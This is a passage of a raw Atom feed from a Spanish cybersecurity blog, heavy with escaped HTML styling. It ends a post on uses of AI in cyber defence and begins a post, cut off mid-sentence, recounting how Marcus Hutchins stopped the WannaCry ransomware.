Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;1. Detección de amenazas: los algoritmos de IA pueden analizar grandes cantidades de datos de una variedad de fuentes para identificar amenazas potenciales. Esto incluye analizar el tráfico de la red, los archivos de registro y el comportamiento del usuario para identificar anomalías que puedan indicar una brecha de seguridad. &lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;2. Respuesta a incidentes: Los sistemas de respuesta a incidentes impulsados por IA pueden ayudar a las organizaciones a responder de manera rápida y efectiva al automatizar la identificación de la amenaza, priorizar la respuesta e incluso sugerir acciones de remediación.&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;3. Gestión de identidades y accesos: Los sistemas de administración de acceso e identidad impulsados por IA pueden ayudar a las organizaciones a detectar y prevenir el acceso no autorizado mediante el análisis del comportamiento del usuario y la identificación de amenazas potenciales.&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;4. Detección de malware: la IA también se puede utilizar para detectar y prevenir ataques de malware. Al analizar el comportamiento de los archivos y las aplicaciones, los algoritmos de IA pueden identificar firmas de malware y evitar su ejecución.&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;5. Evaluación de vulnerabilidades: los sistemas de evaluación de vulnerabilidades impulsados por IA pueden escanear los sistemas de TI para identificar vulnerabilidades y priorizarlas en función del impacto potencial. Al automatizar el proceso de evaluación de vulnerabilidades, las organizaciones pueden ahorrar tiempo y mejorar la precisión de sus evaluaciones.&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;Sin embargo, si bien la IA tiene el potencial de mejorar significativamente la ciberseguridad, también plantea algunos desafíos. Uno de los principales desafíos es que los sistemas de ciberseguridad impulsados por IA pueden ser susceptibles de atacarse a sí mismos. Los piratas informáticos pueden usar algoritmos de IA para generar datos falsos realistas que pueden engañar a los sistemas impulsados ​​por IA para que piensen que no se está produciendo un ataque. Además, los sistemas de IA son tan buenos como los datos con los que están entrenados. Si los datos están sesgados o incompletos, es posible que el sistema de IA no pueda detectar todas las amenazas.&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;Para abordar estos desafíos, las organizaciones deben asegurarse de que sus sistemas de ciberseguridad impulsados por IA se actualicen y capaciten regularmente en una amplia gama de datos. Además, es importante implementar múltiples capas de seguridad para reducir el riesgo de que los sistemas impulsados por IA se vean comprometidos.&amp;nbsp;&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;Autor: Lucas Rolan&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;&lt;span class=&quot;ql-hashtag&quot; style=&quot;background: var(--artdeco-reset-base-background-transparent); border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; font-size: var(--artdeco-reset-base-font-size-hundred-percent); font-weight: var(--artdeco-reset-typography-font-weight-bold); margin: var(--artdeco-reset-base-margin-zero); outline: var(--artdeco-reset-base-outline-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); vertical-align: var(--artdeco-reset-base-vertical-align-baseline);&quot;&gt;#ciberseguridad&lt;/span&gt; &lt;span class=&quot;ql-hashtag&quot; style=&quot;background: var(--artdeco-reset-base-background-transparent); border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; font-size: var(--artdeco-reset-base-font-size-hundred-percent); font-weight: var(--artdeco-reset-typography-font-weight-bold); margin: var(--artdeco-reset-base-margin-zero); outline: var(--artdeco-reset-base-outline-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); vertical-align: var(--artdeco-reset-base-vertical-align-baseline);&quot;&gt;#inteligenciaartificial&lt;/span&gt; &lt;span class=&quot;ql-hashtag&quot; style=&quot;background: var(--artdeco-reset-base-background-transparent); border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; font-size: var(--artdeco-reset-base-font-size-hundred-percent); font-weight: var(--artdeco-reset-typography-font-weight-bold); margin: var(--artdeco-reset-base-margin-zero); outline: var(--artdeco-reset-base-outline-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); vertical-align: var(--artdeco-reset-base-vertical-align-baseline);&quot;&gt;#ti&lt;/span&gt; &lt;span class=&quot;ql-hashtag&quot; style=&quot;background: var(--artdeco-reset-base-background-transparent); border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; font-size: var(--artdeco-reset-base-font-size-hundred-percent); font-weight: var(--artdeco-reset-typography-font-weight-bold); margin: var(--artdeco-reset-base-margin-zero); outline: var(--artdeco-reset-base-outline-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); vertical-align: var(--artdeco-reset-base-vertical-align-baseline);&quot;&gt;#malware&lt;/span&gt; &lt;span class=&quot;ql-hashtag&quot; style=&quot;background: var(--artdeco-reset-base-background-transparent); border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; font-size: var(--artdeco-reset-base-font-size-hundred-percent); font-weight: var(--artdeco-reset-typography-font-weight-bold); margin: var(--artdeco-reset-base-margin-zero); outline: var(--artdeco-reset-base-outline-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); vertical-align: var(--artdeco-reset-base-vertical-align-baseline);&quot;&gt;#algoritmos&lt;/span&gt; &lt;/p&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/2803540420570089706/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2023/02/combinacion-de-ciberseguridad-e.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/2803540420570089706'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/2803540420570089706'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2023/02/combinacion-de-ciberseguridad-e.html' title='Combinación de ciberseguridad e inteligencia artificial (IA)'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj923rNKvyPJk2i5BypBAa8Mq4FyiDtYo6PnUhP0WFYohDWr-zRpJB2JlxSn9x6a4SrHweJYJVbmZdTY4wpG5sBoyPgHYstg_ZaJxkbcYmPrPbO2NlTPoDnjsF-bEWaJG6_8xCwlc2AvMrrc5drtcq3JhpRXkIg_3WyXb3qdlZy9rk7aA7YM0eQx2iB/s72-w400-h235-c/Ciberseguridad%20IA.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-7249222214651999024</id><published>2023-02-13T12:55:00.010-04:00</published><updated>2023-02-13T13:33:48.907-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ciberdelincuencia"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberseguridad"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberterrorismo"/><category scheme="http://www.blogger.com/atom/ns#" term="Marcus Hutchins"/><title type='text'>Historia de Marcus Hutchins</title><content type='html'>&lt;h1 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;span style=&quot;font-family: georgia;&quot;&gt;¿Conoces la historia de Marcus Hutchins?&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;span style=&quot;font-family: georgia;&quot;&gt;El hacker que salvo el Internet&lt;/span&gt;&lt;span style=&quot;font-family: georgia;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/h1&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;p style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHMzdGqI4SJgS0m2YpjN7ElQSBNVySeC8Nmg11FBG2vTqqLdbcfwHpqEymnv6zuB9kU101HC0ecTRS_OjQhHa7W3Rl1VvL_d4AmaSE91cENy_Q5iV8HiqoPwKIhECmlrIVHHuIaA27TXcENbvLUuE4FCs3zJLtNbOdQUvqRRUeaDH30ECV1OwxbS9/s970/Marcus%20Hutchins.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: georgia;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;922&quot; data-original-width=&quot;970&quot; height=&quot;304&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHMzdGqI4SJgS0m2YpjN7ElQSBNVySeC8Nmg11FBG2vTqqLdbcfwHpqEymnv6zuB9kU101HC0ecTRS_OjQhHa7W3Rl1VvL_d4AmaSE91cENy_Q5iV8HiqoPwKIhECmlrIVHHuIaA27TXcENbvLUuE4FCs3zJLtNbOdQUvqRRUeaDH30ECV1OwxbS9/s320/Marcus%20Hutchins.png&quot; width=&quot;320&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: georgia;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: large;&quot;&gt;&lt;span&gt;El 12 de mayo de 2017, los ordenadores fallaron en un hospital público de Londres, en las pantallas aparecía un mensaje: &quot;Tus archivos han sido encriptados&quot;, y se exigía el pago de 300 dólares en bitcoins para desbloquearlos, el mundo se enfrentaba a uno de los ataques cibernéticos más destructivos para ese momento, e&lt;/span&gt;l ransomware conocido como WannaCry afectaba hospitales, oficinas de gobierno, colegios y empresas paralizando internet y secuestrando ordenadores en más de 150 países.&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: large;&quot;&gt;&lt;span&gt;En medio del caos y sin haber encontrado una manera de eliminar el ransomware que se esparcía rápidamente por todo el mundo, un héroe conocido como MalwareTech&amp;nbsp;&lt;/span&gt;Marcus Hutchins&amp;nbsp;encontraba una solución que terminaba con la propagación del malware,&amp;nbsp;el hacker de solo 22 años salvó Internet desde Inglaterra, 